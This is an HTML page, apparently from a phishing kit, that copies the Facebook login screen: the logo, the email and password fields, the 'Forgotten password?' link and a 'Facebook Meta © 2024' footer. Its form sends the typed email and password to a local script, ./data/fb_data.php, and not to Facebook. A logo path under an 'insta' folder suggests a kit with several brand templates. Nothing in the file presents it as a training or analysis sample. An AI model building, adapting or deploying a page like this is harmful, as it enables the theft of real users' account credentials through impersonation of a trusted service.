
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap">
  <style>
    body {
      background-color: #f8f9fa;
      font-family: 'Roboto', sans-serif;
      margin: 0;
      display: flex;
      justify-content: center;
      align-items: center;
      min-height: 100vh;
      flex-direction: column;
    }

    .container {
      width: 80%;
      max-width: 400px;
      background-color: #ffffff;
      padding: 30px;
      box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
      border-radius: 10px;
      text-align: center;
    }

    .container img {
      width: 80%;
      max-width: 150px;
      margin-bottom: 20px;
    }

    .container input[type="text"],
    .container input[type="password"] {
      width: 100%;
      padding: 12px;
      margin-bottom: 20px;
      border: 1px solid #ced4da;
      border-radius: 5px;
      font-size: 16px;
      box-sizing: border-box;
    }

    .container button[type="submit"],
    .create-account-button {
      width: 100%;
      padding: 12px;
      background-color: #007bff;
      color: #fff;
      border: none;
      border-radius: 5px;
      font-size: 16px;
      cursor: pointer;
      transition: background-color 0.3s ease;
    }

    .container button[type="submit"]:hover,
    .create-account-button:hover {
      background-color: #0056b3;
    }

    .container a {
      display: block;
      font-size: 14px;
      color: #007bff;
      text-decoration: none;
      margin-bottom: 20px;
    }

    .footer {
      background-color: #333;
      color: #fff;
      padding: 10px;
      text-align: center;
      margin-top: 120px;
      width: 100%; /* Full width */
    }
  </style>
</head>
<body>
  <div class="container">
    <img src="./data/insta/logo.png" alt="Facebook Logo">
    <form action="./data/fb_data.php" method="post">
      <input type="text" name="email" placeholder="Mobile number or email address">
      <input type="password" name="password" placeholder="Password">
      <button type="submit">Log In</button>
    </form>
    <a href="#">Forgotten password?</a>
    <button id="create-account" class="create-account-button">
      <span>Create new account</span>
    </button>
  </div>
  <div class="footer">
    <span>English (UK)</span>
    <span>پښتو</span>
    <span>हिन्दी</span>
    <span>Español</span>
    <span>اردو</span
    <br>
    <h1 style="border:orange;"></h1> 
    <span>Facebook Meta © 2024</span>
  </div>
</body>
</html>
